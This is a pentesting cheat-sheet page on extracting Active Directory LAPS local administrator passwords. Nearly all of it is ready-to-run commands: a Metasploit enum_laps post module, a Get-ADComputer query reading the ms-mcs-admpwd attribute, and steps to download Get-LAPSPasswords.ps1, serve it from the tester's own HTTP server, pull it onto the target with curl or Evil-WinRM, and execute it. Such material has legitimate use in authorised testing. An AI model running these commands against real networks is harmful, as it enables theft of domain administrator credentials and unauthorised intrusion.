LAPS (Local Administrator Password Solution) Pentesting

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory.

msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit
Copied!

First, check if you are in the LAPS_Readers group.

net user <current-username>
# Global Group memberships  *LAPS_Readers
Copied!

Get-ADComputer gets the information of the Active Directory computer.

Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'
Copied!

Download the Payload in Local Machine
If you are in LAPS_Readers, you can get the administrator's password using Get-LAPSPasswords.ps1.
```
wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
Copied!
```
Transfer the Payload to Target Machine
- via PowerShell
  First off, open web server in local machine.
  python3 -m http.server 8000 Copied!
  Then curl in target machine
  curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1 Copied!
- via Evil-WinRM
  If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding -s flag when connecting.
  evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory Copied!
  Then just execute the payload in evil-winrm console.
  PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1 Copied!
Execute the Payload in Target Machine
```
.\Get-LAPSPasswords.ps1
```

Last updated 2 years ago